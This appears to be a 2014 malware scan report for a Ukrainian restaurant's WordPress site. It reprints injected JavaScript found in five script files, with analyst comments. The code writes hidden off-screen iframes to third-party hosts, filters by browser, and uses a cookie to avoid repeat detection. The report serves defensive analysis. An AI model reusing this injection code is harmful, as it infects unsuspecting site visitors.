Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=restoran-amulet.com.ua
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://restoran-amulet.com.ua/
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://restoran-amulet.com.ua/ | 200 OK Content-Length: 30718 Content-Type: text/html | clean |
http://restoran-amulet.com.ua/wp-content/themes/restoran/script.js | 200 OK Content-Length: 1611 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
// Analyst annotations (the code itself is reproduced unchanged from the scan report).
// Summary: a cookie helper plus a routine that writes an off-screen iframe pointing at a
// third-party host. NOTE(review): this excerpt is shorter than the 1611-byte Content-Length
// reported for the file and references names it never defines (`po`, `Showcontentid`), so the
// listing is likely incomplete; retrieve the raw file before drawing conclusions.

/**
 * Returns the decoded value of the cookie called `name`, or undefined when it is absent.
 * Regex metacharacters in `name` are backslash-escaped before it is placed in the pattern.
 */
function getCookie(name) {
  var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" ));
  return matches ? decodeURIComponent(matches[1]) : undefined;
}

/**
 * Writes a hidden iframe into the page when `po` is falsy.
 * `ulrcont` and `bb` are computed but not used in this excerpt.
 */
function Visitrepositorium() {
  var pipka = navigator.userAgent;
  // True for Chrome, IEMobile, or a User-Agent where "Windows" is absent (-1) or at index 0.
  var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
  // True when no "lastshow" cookie is present.
  var bb = (getCookie("lastshow") === undefined);
  // `po` is not declared anywhere in this excerpt.
  if (!po) {
    // The iframe is 134x134 and absolutely positioned at -800px/-800px, outside the visible page.
    // The tag name and the "position" keyword are split across string concatenations,
    // presumably to defeat literal-string signatures; scan the rendered DOM as well as the source.
    document.write('<ifra'+'me src="http://popikals.thunderbarrel.com/pociskalet15.html" style="po'+'sition:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe>');
  }
}
// Entry point as shown: calls a function that this excerpt does not define;
// Visitrepositorium() itself is never invoked here.
Showcontentid();
Antivirus reports:
| ||
http://restoran-amulet.com.ua/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 961 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
// Analyst annotations (the code itself is reproduced unchanged from the scan report).
// Summary: a cookie helper plus a routine that writes an off-screen iframe pointing at a
// third-party host, limited to once per 64 hours per browser by a "lastshow" cookie.
// NOTE(review): the row for this URL reports 961 bytes for jquery.js?ver=1.7.2, far smaller than
// a jQuery build, so the legitimate file body appears to have been replaced; confirm against a
// known-good copy. The same 961-byte result is reported for other script files on this host.

/**
 * Returns the decoded value of the cookie called `name`, or undefined when it is absent.
 * Regex metacharacters in `name` are backslash-escaped before it is placed in the pattern.
 */
function getCookie(name) {
  var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" ));
  return matches ? decodeURIComponent(matches[1]) : undefined;
}

/**
 * Writes a hidden iframe and sets the "lastshow" cookie, but only for browsers that pass the
 * User-Agent filter and do not already carry that cookie.
 */
function Visitrepositorium() {
  var pipka = navigator.userAgent;
  // True for Chrome, IEMobile, or a User-Agent where "Windows" is absent (-1) or at index 0.
  // The payload below runs only when this is false, i.e. Windows browsers other than those two.
  var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
  // True when no "lastshow" cookie is present (first visit, or the cookie has expired).
  var bb = (getCookie("lastshow") === undefined);
  if (!ulrcont && bb) {
    // The iframe is 140x140 and absolutely positioned at top:-889px/left:-889px, outside the visible page.
    document.write('<iframe src="http://digialto.9chan.us/nunegarow15.html?" style="border-style:dashed;position:absolute;top:-889px;left:-889px;" height="140" width="140"></iframe>');
    // Expiry is 64 hours from now; with path=/ the cookie applies to the whole site.
    var date = new Date( new Date().getTime() + 64*60*60*1000 );
    // While this cookie exists the iframe is not written again, so a repeat visit from the same
    // browser will look clean; re-test with an empty cookie jar and a matching User-Agent.
    document.cookie="lastshow=1; path=/; expires="+date.toUTCString();
  }
}
// Runs as soon as the script is loaded.
Visitrepositorium();
Antivirus reports:
| ||
http://restoran-amulet.com.ua/wp-content/plugins/content-slide/js/coin-slider.js?ver=3.4.1 | 200 OK Content-Length: 1622 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
// Analyst annotations (the code itself is reproduced unchanged from the scan report).
// Summary: a cookie helper plus a routine that writes an off-screen iframe pointing at a
// third-party host. NOTE(review): this excerpt is shorter than the 1622-byte Content-Length
// reported for the file and references names it never defines (`po`, `Showcontentid`), so the
// listing is likely incomplete; retrieve the raw file before drawing conclusions.

/**
 * Returns the decoded value of the cookie called `name`, or undefined when it is absent.
 * Regex metacharacters in `name` are backslash-escaped before it is placed in the pattern.
 */
function getCookie(name) {
  var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" ));
  return matches ? decodeURIComponent(matches[1]) : undefined;
}

/**
 * Writes a hidden iframe into the page when `po` is falsy.
 * `ulrcont` and `bb` are computed but not used in this excerpt.
 */
function Visitrepositorium() {
  var pipka = navigator.userAgent;
  // True for Chrome, IEMobile, or a User-Agent where "Windows" is absent (-1) or at index 0.
  var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
  // True when no "lastshow" cookie is present.
  var bb = (getCookie("lastshow") === undefined);
  // `po` is not declared anywhere in this excerpt.
  if (!po) {
    // The iframe is 134x134 and absolutely positioned at -800px/-800px, outside the visible page.
    // The tag name and the "position" keyword are split across string concatenations,
    // presumably to defeat literal-string signatures; scan the rendered DOM as well as the source.
    document.write('<ifra'+'me src="http://rutioka.sydneyinlinehockey.com/asobentars15.html" style="po'+'sition:absolute;left: -800px;top: -800px;" height="134" width="134"></iframe>');
  }
}
// Entry point as shown: calls a function that this excerpt does not define;
// Visitrepositorium() itself is never invoked here.
Showcontentid();
Antivirus reports:
| ||
http://restoran-amulet.com.ua/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.0 | 200 OK Content-Length: 961 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
// Analyst annotations (the code itself is reproduced unchanged from the scan report).
// Summary: a cookie helper plus a routine that writes an off-screen iframe pointing at a
// third-party host, limited to once per 64 hours per browser by a "lastshow" cookie.
// NOTE(review): the same 961-byte result is reported for several unrelated script files on this
// host, which suggests the files were overwritten on the server; compare each against a
// known-good copy of the plugin or core release.

/**
 * Returns the decoded value of the cookie called `name`, or undefined when it is absent.
 * Regex metacharacters in `name` are backslash-escaped before it is placed in the pattern.
 */
function getCookie(name) {
  var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" ));
  return matches ? decodeURIComponent(matches[1]) : undefined;
}

/**
 * Writes a hidden iframe and sets the "lastshow" cookie, but only for browsers that pass the
 * User-Agent filter and do not already carry that cookie.
 */
function Visitrepositorium() {
  var pipka = navigator.userAgent;
  // True for Chrome, IEMobile, or a User-Agent where "Windows" is absent (-1) or at index 0.
  // The payload below runs only when this is false, i.e. Windows browsers other than those two.
  var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
  // True when no "lastshow" cookie is present (first visit, or the cookie has expired).
  var bb = (getCookie("lastshow") === undefined);
  if (!ulrcont && bb) {
    // The iframe is 140x140 and absolutely positioned at top:-889px/left:-889px, outside the visible page.
    document.write('<iframe src="http://digialto.9chan.us/nunegarow15.html?" style="border-style:dashed;position:absolute;top:-889px;left:-889px;" height="140" width="140"></iframe>');
    // Expiry is 64 hours from now; with path=/ the cookie applies to the whole site.
    var date = new Date( new Date().getTime() + 64*60*60*1000 );
    // While this cookie exists the iframe is not written again, so a repeat visit from the same
    // browser will look clean; re-test with an empty cookie jar and a matching User-Agent.
    document.cookie="lastshow=1; path=/; expires="+date.toUTCString();
  }
}
// Runs as soon as the script is loaded.
Visitrepositorium();
Antivirus reports:
| ||
http://restoran-amulet.com.ua/wp-includes/js/tw-sack.js?ver=1.6.1 | 200 OK Content-Length: 961 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
// Analyst annotations (the code itself is reproduced unchanged from the scan report).
// Summary: a cookie helper plus a routine that writes an off-screen iframe pointing at a
// third-party host, limited to once per 64 hours per browser by a "lastshow" cookie.
// NOTE(review): the same 961-byte result is reported for several unrelated script files on this
// host, which suggests the files were overwritten on the server; compare each against a
// known-good copy of the plugin or core release.

/**
 * Returns the decoded value of the cookie called `name`, or undefined when it is absent.
 * Regex metacharacters in `name` are backslash-escaped before it is placed in the pattern.
 */
function getCookie(name) {
  var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" ));
  return matches ? decodeURIComponent(matches[1]) : undefined;
}

/**
 * Writes a hidden iframe and sets the "lastshow" cookie, but only for browsers that pass the
 * User-Agent filter and do not already carry that cookie.
 */
function Visitrepositorium() {
  var pipka = navigator.userAgent;
  // True for Chrome, IEMobile, or a User-Agent where "Windows" is absent (-1) or at index 0.
  // The payload below runs only when this is false, i.e. Windows browsers other than those two.
  var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1);
  // True when no "lastshow" cookie is present (first visit, or the cookie has expired).
  var bb = (getCookie("lastshow") === undefined);
  if (!ulrcont && bb) {
    // The iframe is 140x140 and absolutely positioned at top:-889px/left:-889px, outside the visible page.
    document.write('<iframe src="http://digialto.9chan.us/nunegarow15.html?" style="border-style:dashed;position:absolute;top:-889px;left:-889px;" height="140" width="140"></iframe>');
    // Expiry is 64 hours from now; with path=/ the cookie applies to the whole site.
    var date = new Date( new Date().getTime() + 64*60*60*1000 );
    // While this cookie exists the iframe is not written again, so a repeat visit from the same
    // browser will look clean; re-test with an empty cookie jar and a matching User-Agent.
    document.cookie="lastshow=1; path=/; expires="+date.toUTCString();
  }
}
// Runs as soon as the script is loaded.
Visitrepositorium();
Antivirus reports:
| ||
http://restoran-amulet.com.ua/wp-content/plugins/wp-polls/polls-js-packed.js?ver=2.40 | 200 OK Content-Length: 1994 Content-Type: application/x-javascript | clean |
http://lite.piclens.com/current/piclens_optimized.js | 200 OK Content-Length: 21750 Content-Type: application/x-javascript | clean |
http://restoran-amulet.com.ua/nashi-zaly/ | 200 OK Content-Length: 30272 Content-Type: text/html | clean |
http://restoran-amulet.com.ua/karta-sajta/ | 200 OK Content-Length: 22854 Content-Type: text/html | clean |
http://restoran-amulet.com.ua/category/kejtering/ | 200 OK Content-Length: 25788 Content-Type: text/html | clean |
http://restoran-amulet.com.ua/category/kejtering/ / | 404 Not Found Content-Length: 21356 Content-Type: text/html | clean |
http://restoran-amulet.com.ua/category/kejtering/ / / | 404 Not Found Content-Length: 21352 Content-Type: text/html | clean |
http://restoran-amulet.com.ua/category/kejtering/ / / / | 404 Not Found Content-Length: 21364 Content-Type: text/html | clean |
http://restoran-amulet.com.ua/category/kejtering/ / / / / | 404 Not Found Content-Length: 21346 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: restoran-amulet.com.ua
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 27 Aug 2014 12:26:39 GMT
Server: nginx/1.4.2
Vary: Accept-Encoding
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
X-Pingback: http://restoran-amulet.com.ua/xmlrpc.php
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: restoran-amulet.com.ua
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 27 Aug 2014 12:26:39 GMT
Server: nginx/1.4.2
Vary: Accept-Encoding
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
X-Pingback: http://restoran-amulet.com.ua/xmlrpc.php
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: restoran-amulet.com.ua
Referer: http://www.google.com/search?q=restoran-amulet.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: restoran-amulet.com.ua
Referer: http://www.google.com/search?q=restoran-amulet.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.